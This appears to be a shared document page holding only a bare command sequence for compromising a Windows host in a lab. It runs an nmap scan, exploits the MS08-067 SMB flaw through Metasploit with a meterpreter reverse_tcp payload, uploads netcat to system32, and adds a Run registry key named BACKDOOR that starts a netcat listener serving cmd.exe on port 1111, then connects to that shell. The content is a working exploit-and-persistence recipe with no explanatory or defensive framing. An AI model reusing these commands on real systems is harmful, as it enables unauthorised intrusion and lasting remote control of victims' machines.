You are on page 1of 1

cp /pentest/windows-binaries/tools/nc.exe /root/Desktop nmap -sS -O 192.168.146.130 msfconsole use exploit/windows/smb/ms08_067_netapi set payload windows/meterpreter/reverse_tcp set lhost 192.168.146.

133 set rhost 192.168.146.130 exploit upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\ reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v BACKDOO R -d c:\\WINDOWS\\system32\\nc.exe" -: -d -p 1111 -e cmd.exe" reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run reboot nc 192.168.146.130 1111

You might also like